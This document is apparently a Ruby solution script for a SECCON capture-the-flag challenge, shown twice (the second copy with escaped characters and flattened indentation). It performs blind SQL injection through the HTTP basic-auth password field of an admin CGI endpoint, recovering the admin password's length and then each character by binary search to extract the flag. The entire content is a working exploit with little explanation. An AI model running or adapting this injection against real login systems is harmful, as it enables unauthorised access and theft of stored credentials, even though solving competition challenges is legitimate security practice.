shiv3/bli_qli.rb

## bli_qli.rb
require 'net/http'
require 'uri'
def req_length(l,o)
	url = URI.parse('http://basiq.pwn.seccon.jp/admin/admin.cgi')
	req = Net::HTTP::Post.new(url.path)
	pass = " ' or (id = 'admin' and length(pass)" + o + l.to_s + " ) ; -- ' "
	req.basic_auth 'admin', pass
	result = Net::HTTP.new(url.host, url.port).start {|http| http.request(req) }
	return result.body
end

def req(s,o,i)
	url = URI.parse('http://basiq.pwn.seccon.jp/admin/admin.cgi')
	req = Net::HTTP::Post.new(url.path)
	pass = " ' or (id = 'admin' and substring(pass," + (i + 1).to_s +   ",1)" + o + " '" + s  + "' ) ; -- ' "
	req.basic_auth 'admin', pass
	result = Net::HTTP.new(url.host, url.port).start {|http| http.request(req) }
	body = result.body
	return body.include?("OK")
end

def binserch(i)
	arr = (" ".."`").to_a
	("{".."~").to_a.each{|s|arr.push(s)}
	l = 0
	r = arr.length
	while l <= r do
		mid = (l + r)/2
		print arr[mid]
		next if arr[mid].nil?
		if req(arr[mid],"<",i)
			r = mid - 1
		elsif req(arr[mid],">",i)
			l = mid + 1
		elsif req(arr[mid],"=",i)
			return  arr[mid]
		end
	end
	puts ""
end
ans = []
len = 0
300.times do |i|
	res = req_length(i,">")
	p i,res[0,10]
	unless res.include?("OK")
		len = i
		break
	end
end
puts "passlength:" + len.to_s
len.times do |i|
	q = binserch(i)
	ans.push q unless q.nil?
	p ans.join
end
puts "flag is :" + ans.join("")
	require 'net/http'
	require 'uri'
	def req_length(l,o)
	url = URI.parse('http://basiq.pwn.seccon.jp/admin/admin.cgi')
	req = Net::HTTP::Post.new(url.path)
	pass = " ' or (id = 'admin' and length(pass)" + o + l.to_s + " ) ; -- ' "
	req.basic_auth 'admin', pass
	result = Net::HTTP.new(url.host, url.port).start {\|http\| http.request(req) }
	return result.body
	end

	def req(s,o,i)
	url = URI.parse('http://basiq.pwn.seccon.jp/admin/admin.cgi')
	req = Net::HTTP::Post.new(url.path)
	pass = " ' or (id = 'admin' and substring(pass," + (i + 1).to_s + ",1)" + o + " '" + s + "' ) ; -- ' "
	req.basic_auth 'admin', pass
	result = Net::HTTP.new(url.host, url.port).start {\|http\| http.request(req) }
	body = result.body
	return body.include?("OK")
	end

	def binserch(i)
	arr = (" ".."`").to_a
	("{".."~").to_a.each{\|s\|arr.push(s)}
	l = 0
	r = arr.length
	while l <= r do
	mid = (l + r)/2
	print arr[mid]
	next if arr[mid].nil?
	if req(arr[mid],"<",i)
	r = mid - 1
	elsif req(arr[mid],">",i)
	l = mid + 1
	elsif req(arr[mid],"=",i)
	return arr[mid]
	end
	end
	puts ""
	end
	ans = []
	len = 0
	300.times do \|i\|
	res = req_length(i,">")
	p i,res[0,10]
	unless res.include?("OK")
	len = i
	break
	end
	end
	puts "passlength:" + len.to_s
	len.times do \|i\|
	q = binserch(i)
	ans.push q unless q.nil?
	p ans.join
	end
	puts "flag is :" + ans.join("")